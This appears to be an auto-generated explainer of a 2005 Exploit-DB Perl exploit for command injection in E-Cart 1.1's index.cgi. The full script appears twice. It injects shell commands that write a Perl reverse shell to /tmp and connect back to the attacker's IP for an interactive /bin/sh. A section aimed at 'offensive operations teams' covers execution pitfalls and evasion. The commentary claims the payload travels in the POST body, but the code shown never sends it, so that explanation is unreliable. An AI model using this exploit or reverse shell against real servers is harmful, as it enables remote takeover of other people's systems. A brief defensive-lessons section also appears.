By exploitdb papers bot•April 25, 2005•

papers

E-Cart 1.1 'index.cgi' Remote Command Execution Explained

What this paper is

This paper details a vulnerability in the E-Cart E-Commerce Software, specifically affecting version 1.1 and earlier. The vulnerability lies within the index.cgi script, allowing an attacker to execute arbitrary commands on the web server by manipulating the art parameter in a specific URL request. The exploit provided is a Perl script designed to leverage this vulnerability to gain a remote shell.

Simple technical breakdown

The E-Cart software, when processing requests for specific articles (action=viewart), uses the art parameter to determine which data file to load. The vulnerability occurs because the index.cgi script doesn't properly sanitize or escape special characters within the art parameter. This allows an attacker to inject shell metacharacters, like the pipe symbol (|), to append their own commands to the legitimate command being executed by the script.

The exploit script works by:

Gathering information: It prompts the operator for the target server's hostname, port, the path to the index.cgi script, and the operator's IP address and port for a reverse shell connection.
Constructing the payload: It crafts a malicious URL that includes a command to write a Perl script to the target's /tmp directory. This Perl script is designed to establish a reverse shell back to the attacker.
Executing the exploit: It sends an HTTP POST request to the target server, including the crafted malicious URL.
Initiating the reverse shell: It instructs the operator to set up a listener (e.g., using netcat) on their machine to receive the incoming reverse shell connection.

The core of the attack is the ability to inject commands via the art parameter, which is then executed by the web server's CGI interpreter.

Complete code and payload walkthrough

The provided exploit is a Perl script. Let's break down its components.

#!/usr/bin/perl
#
# Example added if code doesn't work for ya:
# http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
# /str0ke
#
#
# info: emanuele@orvietolug.org
#
use IO::Socket;

print "\n\n ~~ www.badroot.org ~~ \n\n";
print " E-Cart E-Commerce Software index.cgi\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <= E-Cart 2004 v1.1\n";
print " http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0  \n\n";
print " ~~ code by z\\ ~~\n\n\n";
print " 04.23.2005\n\n\n";


print "hostname: \n";
chomp($server=<STDIN>);

print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (/cgi-bin/ecart/)\n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);


print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";

print "[*] try to exploiting...\n";

$string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";

print "[*] OK! \n";
print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
print "[*] starting connect back on $ip :$reverse\n";
print "[*] DONE!\n";
print "[*] Loock netcat windows and funny\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die;


print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: 7330ecart\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING   \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n";


# milw0rm.com [2005-04-25]

Code Fragment/Block -> Practical Purpose

#!/usr/bin/perl: Shebang line, indicating the script should be executed by the Perl interpreter.
use IO::Socket;: Imports the IO::Socket module, which is essential for network programming in Perl, allowing the script to create network connections.
print "\n\n ~~ www.badroot.org ~~ \n\n"; ... print " 04.23.2005\n\n\n";: These lines are informational banners and metadata about the exploit, including the author, vulnerability details, affected version, and publication date.
print "hostname: \n"; chomp($server=<STDIN>);: Prompts the user to enter the target server's hostname or IP address and stores it in the $server variable. chomp removes the trailing newline character.
print "port: (default: 80)\n"; chomp($port=<STDIN>); $port=80 if ($port =~/\D/ ); $port=80 if ($port eq "" );: Prompts for the target port. If the input is not a digit (/\D/) or is empty, it defaults to port 80.
print "path: (/cgi-bin/ecart/)\n"; chomp($path=<STDIN>);: Prompts for the path to the index.cgi script on the web server. The default is /cgi-bin/ecart/.
print "your ip (for reverse connect): \n"; chomp($ip=<STDIN>);: Prompts for the attacker's IP address, which will be used for the reverse shell connection.
print "your port (for reverse connect): \n"; chomp($reverse=<STDIN>);: Prompts for the attacker's port, which will be used for the reverse shell connection.
$string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{...}." >>cbs.pl;perl cbs.pl $ip $reverse|";: This is the core of the exploit construction.
- /$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat: This is the base URL path and parameters that would normally be used to view an article. The art parameter is the injection point.
- |: This is the shell metacharacter that separates the legitimate command from the injected command.
- cd /tmp;: Changes the current directory to /tmp. This is a common location for temporary files and often has write permissions for the web server process.
- echo ".q{...}." >>cbs.pl;: This part writes the Perl code for the reverse shell into a file named cbs.pl in the /tmp directory.
  - q{...}: This is a Perl quoting operator that treats the content within the braces as a single string, handling special characters within the string without needing extensive escaping.
  - use Socket;: Imports the Socket module for low-level network operations.
  - $execute= 'echo "uname -a";echo "id";/bin/sh';: Defines a string that will be executed. It first prints the system's kernel information (uname -a), then the user ID and group information (id), and finally launches an interactive shell (/bin/sh).
  - $target=$ARGV[0]; $port=$ARGV[1];: These lines are intended to receive the attacker's IP and port as command-line arguments when cbs.pl is executed. However, in the context of this exploit, $target will be $ip and $port will be $reverse from the user's input.
  - $iaddr=inet_aton($target) || die("Error: $!\n");: Converts the target IP address (attacker's IP) into a network address format.
  - $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");: Creates a socket address structure using the target port (attacker's port) and the network address.
  - $proto=getprotobyname('tcp');: Gets the protocol number for TCP.
  - socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");: Creates a TCP socket.
  - connect(SOCKET, $paddr) || die("Error: $!\n");: Attempts to connect the socket to the attacker's IP and port. This is the reverse shell connection.
  - open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET");: Redirects the standard input, standard output, and standard error of the current process to the established socket connection. This means any commands executed will be sent over the socket, and any output will be received from the socket.
  - system($execute);: Executes the commands defined in $execute (which includes launching /bin/sh).
  - close(STDIN);: Closes the standard input.
- perl cbs.pl $ip $reverse|: This part executes the newly created cbs.pl script on the target server, passing the attacker's IP and port as arguments. The final pipe | is likely intended to ensure the command is properly terminated, though its exact necessity here is debatable.
print "[*] OK! \n"; print "[*] NOW, run in your box: nc -l -vv -p $reverse\n"; ...: These lines provide instructions to the operator, telling them to start a netcat listener on their machine to catch the incoming reverse shell.
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp) or die;: Creates a new socket connection to the target server on the specified port. This is the initial connection to send the exploit request.
print $socket "POST $path HTTP/1.1\n"; ... print $socket "Connection: close\n\n";: This block constructs and sends an HTTP POST request to the target server.
- POST $path HTTP/1.1: Specifies the HTTP method (POST) and the path to the CGI script.
- Host: $server: Sets the Host header.
- Accept: */*, User-Agent: 7330ecart, Pragma: no-cache, Cache-Control: no-cache: These are standard HTTP headers. The User-Agent is customized.
- Connection: close\n\n: Instructs the server to close the connection after the response. The double newline signifies the end of the HTTP headers.
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; ... print "Greetz: albythebest ...\n\n\n";: These are more informational messages, including warnings about potential failure points and acknowledgments.

Payload Stages:

Initial HTTP Request: The Perl exploit script sends an HTTP POST request to the target web server. This request contains a specially crafted URL in the POST data (implicitly, as the exploit constructs the URL and sends it as part of the request body, though the exact mechanism of how the POST data is formed isn't explicitly shown in the print $socket statements, it's implied by the POST $path and the subsequent headers). The critical part is the art parameter, which includes shell metacharacters (|) and commands.
Command Injection and File Creation: The vulnerable index.cgi script on the target server receives the request. Because it doesn't properly sanitize the art parameter, it executes the injected commands. The first injected command (cd /tmp;echo "..." >>cbs.pl;) writes a Perl script (the reverse shell payload) into a file named cbs.pl in the /tmp directory.
Reverse Shell Script Execution: The second injected command (perl cbs.pl $ip $reverse|) executes the newly created cbs.pl script on the target server.
Reverse Shell Connection: The cbs.pl script, running on the target server, uses the Socket module to establish a TCP connection back to the attacker's IP address and port specified by $ip and $reverse.
Shell Redirection: Once the reverse shell connection is established, cbs.pl redirects the standard input, output, and error streams of the target server's process to this socket.
Interactive Shell: The $execute variable within cbs.pl then launches /bin/sh. Because the standard streams are redirected, the attacker can now interact with this shell through their netcat listener, sending commands and receiving output.

Practical details for offensive operations teams

Required Access Level: No elevated privileges are required on the target system itself. The exploit targets the web server process, which typically runs with limited privileges. However, the exploit does require write access to the /tmp directory on the target server to save the cbs.pl script. If /tmp is not writable by the web server process, this specific exploit will fail.
Lab Preconditions:
- A vulnerable E-Cart installation (version <= 2004 v1.1).
- A web server configured to run CGI scripts.
- Network connectivity from the attacker's machine to the target web server.
- Network connectivity from the target web server back to the attacker's machine on the specified reverse shell port.
Tooling Assumptions:
- Perl interpreter: The exploit script is written in Perl and requires a Perl interpreter on the attacker's machine.
- Netcat (or similar listener): The operator needs netcat (or ncat, socat, etc.) on their machine to listen for the incoming reverse shell connection.
- Web browser/HTTP client: While the Perl script handles the HTTP request, understanding HTTP requests is crucial.
Execution Pitfalls:
- Path Discovery: The correct path to index.cgi must be known or discovered. Common paths like /cgi-bin/ecart/ are provided as defaults, but variations exist.
- /tmp Write Permissions: The most significant failure point is if the web server process lacks write permissions in /tmp. The exploit explicitly warns about this. Alternative writable directories might exist, but /tmp is the default for this exploit.
- Firewall Restrictions: Firewalls on the target network or the attacker's network might block the outgoing reverse shell connection from the target server to the attacker's listener.
- WAF/IDS Evasion: Modern Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the shell metacharacters (|) or the suspicious Perl code. The exploit is from 2005 and lacks modern evasion techniques.
- Shellcode Compatibility: The Perl reverse shell code is basic. It might not work reliably on all systems or with all shell configurations. The uname -a and id commands are standard, but /bin/sh might be a symlink to a different shell.
- HTTP POST Data Handling: The exploit sends the malicious URL as part of an HTTP POST request. The exact way the index.cgi script processes POST data versus GET data could be a factor, though the example URL uses GET-style parameters. The exploit script uses print $socket "POST $path HTTP/1.1\n"; which suggests it's sending the exploit string as part of the POST body, but the URL itself is constructed with GET parameters and a pipe. This is a common pattern where the CGI script might append GET parameters to POST data or process them in a combined fashion. The example URL provided in the comments (http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|) strongly suggests the vulnerability is in how the art parameter is handled, regardless of the HTTP method. The exploit script's print $socket "POST $path HTTP/1.1\n"; followed by the constructed $string implies the entire $string is sent as the body of the POST request.
Telemetry:
- Web Server Logs: Access logs will show the HTTP POST request to index.cgi. The URL parameters will be visible. Error logs might show issues if the perl cbs.pl command fails.
- Process Monitoring: On the target server, a new Perl process (perl cbs.pl) will be spawned, followed by /bin/sh. Network monitoring will show an outgoing TCP connection from the web server to the attacker's IP and port.
- File System Monitoring: The creation of cbs.pl in /tmp will be logged if file system auditing is enabled.
- Network Traffic: The initial HTTP request and the subsequent reverse shell TCP connection will be visible on network traffic captures.

Where this was used and when

This exploit was published in April 2005. It targets a specific vulnerability in E-Cart E-Commerce Software version 1.1 and earlier. Exploits of this nature, targeting CGI scripts on web servers, were common in the early to mid-2000s before more robust web application security practices and frameworks became widespread. It's likely this vulnerability was exploited in the wild by attackers seeking to compromise e-commerce websites to steal data, deface sites, or use the compromised server for further malicious activities.

Defensive lessons for modern teams

Input Validation and Sanitization: This is the foundational lesson. All user-supplied input, especially data passed through URL parameters (GET or POST), must be rigorously validated and sanitized before being used in system commands or database queries. Special characters that have meaning in a shell environment (like |, ;, &, $, \, ', ", (, )) should be escaped or removed.
Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. They should not have write access to arbitrary directories like /tmp unless absolutely essential for their operation, and even then, access should be restricted.
Secure CGI Development: Avoid using user input directly in system calls. If dynamic command execution is necessary, use safer alternatives or strictly controlled interfaces. Modern web frameworks often abstract away direct system calls, reducing this risk.
Regular Patching and Updates: Keeping web applications and their underlying server software (web server, operating system, interpreter) updated with the latest security patches is crucial to prevent exploitation of known vulnerabilities.
Web Application Firewalls (WAFs): WAFs can help detect and block malicious requests containing known attack patterns, including shell metacharacters and suspicious code.
Runtime Application Self-Protection (RASP): RASP solutions can monitor and block attacks in real-time by integrating with the application itself.
Security Auditing and Monitoring: Implement comprehensive logging and monitoring of web server access, system processes, and file system activity to detect suspicious behavior.

ASCII visual (if applicable)

This exploit involves a direct interaction between the attacker's machine and the target web server, followed by an outgoing connection from the target back to the attacker.

+-----------------+       HTTP Request       +-----------------+
| Attacker's Host | ----------------------> | Target Web Server |
| (Perl Exploit)  |       (index.cgi)       | (Vulnerable)    |
+-----------------+                          +--------+--------+
                                                       |
                                                       | Injected Commands
                                                       | (write cbs.pl, execute perl)
                                                       v
                                                 +-----+-----+
                                                 | /tmp dir  |
                                                 | (cbs.pl)  |
                                                 +-----------+
                                                       |
                                                       | Reverse Shell Connection
                                                       | (TCP)
                                                       v
+-----------------+       Interactive Shell      +-----------------+
| Attacker's Host | <---------------------- | Target Web Server |
| (Netcat Listener)|       (Shell Commands)      | (/bin/sh)       |
+-----------------+                          +-----------------+

Source references

Paper ID: 954
Paper Title: E-Cart 1.1 - 'index.cgi' Remote Command Execution
Author: z
Published: 2005-04-25
Keywords: CGI, webapps
Paper URL: https://www.exploit-db.com/papers/954
Raw URL: https://www.exploit-db.com/raw/954
Security Focus Archive: http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
#
# Example added if code doesn't work for ya:
# http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
# /str0ke
#
#
# info: emanuele@orvietolug.org
#
use IO::Socket; 

print "\n\n ~~ www.badroot.org ~~ \n\n";
print " E-Cart E-Commerce Software index.cgi\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <= E-Cart 2004 v1.1\n";
print " http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0  \n\n";
print " ~~ code by z\\ ~~\n\n\n";
print " 04.23.2005\n\n\n";


print "hostname: \n"; 
chomp($server=<STDIN>);  

print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (/cgi-bin/ecart/)\n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);


print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";

print "[*] try to exploiting...\n"; 

$string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";

print "[*] OK! \n"; 
print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
print "[*] starting connect back on $ip :$reverse\n";
print "[*] DONE!\n";
print "[*] Loock netcat windows and funny\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp) 
or die; 


print $socket "POST $path HTTP/1.1\n"; 
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: 7330ecart\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING   \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n";


# milw0rm.com [2005-04-25]